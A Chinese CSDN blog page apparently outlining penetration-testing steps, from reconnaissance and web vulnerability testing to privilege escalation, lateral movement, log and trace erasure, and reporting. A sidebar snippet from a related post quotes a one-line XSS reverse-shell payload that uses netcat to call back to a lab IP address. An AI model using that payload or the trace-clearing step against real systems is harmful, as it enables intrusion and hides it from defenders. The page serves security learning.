渗透测试思路

最新推荐文章于 2024-09-08 13:25:37 发布
最新推荐文章于 2024-09-08 13:25:37 发布
阅读量3.1k 收藏
点赞数
分类专栏: 网安 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44424668/article/details/121608550
版权

步骤

  • 信息收集
    • 网络层:路由探测、网络设备、管理接口等信息,如 IP 地址/段、DNS 记录、
    • 主机层:主机存活、端口服务开放情况、操作系统类型等
    • 应用层:web服务器指纹探测、后端挖掘、网站目录、DNS域传送漏洞(手工检测Web应用指纹
  • 渗透测试(若发现问题)
    • 网络测试(ARP欺骗、MITM中间人攻击、DDOS攻击)
    • 数据有效性(SQL注入、跨站脚本、文件上传、代码注入、缓冲区溢出)
    • 认证与会话(旁路绕过、密码找回、目录遍历、文件包含、用户账户猜解如字典攻击、cookie余session草丛、XSS等)
    • 挖掘漏洞
    • 系统配置(应用配置、服务器配置、目录索引、http请求方式、SSL/TLS密钥强度)
    • 业务逻辑分析,查找逻辑漏洞
  • 检测、深度检测、内网渗透
    • 对上一阶段进行数据收集,提升相关系统、主机的权限,获取控制权,尝试内网渗透,参考
  • 痕迹擦除
    • 清除渗透过程中产生的代码和日志文件
  • 报告输出
0xac001d09
关注
专栏目录
渗透测试学习笔记-DDoS攻击
 RBPi' Blog
06-23 3043
反射攻击(Reflection Flood)的原理是攻击者伪造请求,将受害者IP地址作为请求源地址并将之发往互联网中大量存在协议漏洞的反射器,利用这些协议回应包字节数远大于请求包的特点,达到反射放大流量的效果,构成对目标网络的大流量DDoS攻击。由于不需要像传统僵尸网络那样对大量的攻击源进行事先感染和控制,因此发起此类大流量攻击的代价远远小于传统的DDoS攻击。目前已知流量放大倍数最高的反射攻击是...
渗透测试思路整理
闵行小鱼塘
07-02 5435
有些时候渗透测试搞着搞着就陷入了无解状态,不知道再从哪儿下手了,故对渗透测试思路做个整理,后续有新的见解持续更新
登录页面渗透测试思路总结
gududeajun的博客
12-07 9055
登录页面可能产生哪些漏洞呢? 1、注入点及万能密码登录 2、登录时,不安全的用户提示:比如提示用户名不存在或者密码验证码错误 3、查看登录页面源代码,看是否存在敏感信息泄露 4、不安全的验证码 5、在注册账号的时候,是否存在不安全的提示 6、不安全的密码,在注册账号的时候密码没有限制复杂度 7、任意无限注册账号 8、在暴力破解的时候不会限制ip,锁定用户 9、一个账号可以在多地登录,没有安全提示 10、账户登录之后,没有具备超时功能 11、OA,邮件,默认账号等相关系统,在不是自己注册
渗透测试-渗透测试思路总结
lza20001103的博客
08-18 1280
渗透测试-渗透测试思路总结 一、说明 《Metasploit渗透测试魔鬼训练营》等书已经对渗透测试的步骤流程划分得比较合理透彻了,但感觉在多次通读该类书藉之后仍觉得不得要领:要对一台给定的主机进行渗透还是不懂到底该如何着手。想来主要是存在以下两个问题: 第一个是在渗透时,最为关键的是从漏洞分析到渗透攻击这一步很难跨越。因为按书中的漏洞分析,基本只有openvas等漏洞扫描器一条途径;漏洞利用只有Metasploit搜索这一条途径;而漏洞扫描器扫出漏洞、Metasploit中又正好有利用模块更是少
渗透测试思路总结
qq_44635376的博客
02-03 2380
这里写目录标题访问受限域名访问限制反弹shellxss漏洞中的反弹shell军刀中的反弹shell获取用户名和密码提权软件漏洞提权系统漏洞提权 访问受限 域名访问限制 解决方案一:添加域名解析 vim hosts 10.10.10.209 doctors.htb 反弹shell xss漏洞中的反弹shell <img src=http://10.10.14.3/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'10.10.14.3'$IFS'1234')> 军刀
渗透测试思路浅析
哆啦安全
11-26 936
基于js代码进行渗透测试(思路浅析) 渗透测试思路和方法(思维导图) 欢迎加入知识星球,大家的支持是哆啦安全后续输出更多干货最大的动力!
登录框界面之渗透测试思路总结
薛定谔嘚喵博客
06-27 3141
大家都知道,渗透的过程中,遇见登录框是很常见的。下面就简单总结一下渗透中遇见登录页面的思路:首先登录页面可能产生哪些漏洞呢?1、弱密码与暴力破解2、万能密码、SQL与XSS(注入)3、登录时,不安全的用户提示:比如提示用户名不存在或者密码验证码错误4、查看登录页面源代码,看是否存在敏感信息泄露5、不安全的验证码6、在注册账号的时候,是否存在不安全的提示7、不安全的密码,在注册账号的时候密码没有限制复杂度8、任意无限注册账号9、在暴力破解的时候不会限制ip,锁定用户。
APP应用渗透测试思路
永远是少年
01-01 8380
今天继续给大家介绍渗透测试相关知识,本文主要内容是APP应用渗透测试思路。 一、手机模拟器安装 二、抓包测试 三、反编译测试 四、注意事项
登陆页面/登陆框渗透测试思路
剁椒鱼头没剁椒的博客
10-01 1768
以下内容均从网上汇总过来,可能有些利用方式和部分课程或文章中一致,并非主观意愿,秉承学习分享原则对其内容进行汇总,也是作为自己的笔记。可能部分总结归类有些不准确,请不要在意这些-.-。总之再登陆框的位置还有很多的测试方式,可能不全面,但是找的也差不多了,并且有些方式组合到一起可能会有意想不到的收获哦!!
渗透测试常规思路分析
02-26
渗透测试是门技术,也是一门艺术。这门技术(艺术)一开始也不是每个人都会的,正所谓没有人一出生就会走路,从不懂到入门到深谙,一步步慢慢来,每个人都是这样;但是在这个过程中,思路无疑是最重要的,没有做不到...
渗透测试思路篇_常见端口及利用方式1
08-03
①使用系统软件来配置,比如IIS中的FTP文件共享或Linux中的默认服务软件 ②是通过第三方软件来配置,比如Serv-U还有一些网上写的简易ftp服务器等 ①
【网络安全】空字节绕过:URL回调+XSS+SQL绕WAF
等风来
09-07 449
经过进一步测试,我发现WAF在解析HTTP请求时,如果发现恶意查询,会导致服务器挂起。如果我连续提交3个请求且服务器挂起,它就会阻止我的IP地址。
如何启动网络安全计划:首先要做的事情
网络研究观
09-07 1013
保护数据不是一次性的活动,而是一个持续的适应和改进过程。
如何做好网络安全
最新发布
dexunyun的博客
09-08 1030
面对日益复杂的网络威胁,企业必须高度重视网站安全,建立全面的安全防护体系,加强内部和外部安全防护,制定详细的应急响应计划,确保在发生安全事件时能够迅速响应并恢复服务。及时报警、零误报 基于智能监测分波算法对全国超50个监测节点智能任务分配,适应不同运营商、不同线路的网络状况,模拟真实的网络环境,提供精准、迅速的监测结果,并通过可视化风险评估报表、安全报告及风险告警等手段构建完善监测体系。一旦网站遭受攻击,这些数据可能被窃取、篡改或泄露,不仅损害企业利益,还可能侵犯用户隐私,导致法律纠纷和声誉损失。
Web安全之SQL注入:如何预防及解决
J老熊
09-07 1521
SQL注入是一种通过在用户输入中嵌入恶意SQL代码的攻击方式。攻击者可以利用漏洞在未经授权的情况下访问数据库,执行原本不被允许的操作。例如,攻击者可以绕过身份验证、检索敏感信息,甚至删除数据。SQL注入是Web应用程序中最常见且最危险的安全漏洞之一,尤其是在涉及数据库操作的场景下,如电商交易系统。通过使用、严格的输入验证、最小权限原则以及使用ORM框架等方法,我们可以有效防止SQL注入攻击。开发人员需要养成良好的编码习惯,始终考虑潜在的安全问题,确保应用程序的安全性。
【网络安全】服务基础第二阶段——第三节:Linux系统管理基础----Linux用户与组管理
goldfish8848的博客
09-07 797
SUID、SGID 和 Sticky Bit 都在Linux提权中扮演了重要⻆⾊。
【网络安全】漏洞挖掘
anquan2233的博客
08-29 1881
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
web站点渗透测试思路
04-28
Web站点渗透测试思路一般包括以下几个步骤: 1.信息收集:收集目标站点的信息,包括IP地址、域名、服务器类型、开放端口等。 2.漏洞扫描:使用扫描工具对目标站点进行漏洞扫描,寻找可能存在的漏洞。 3.漏洞利用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值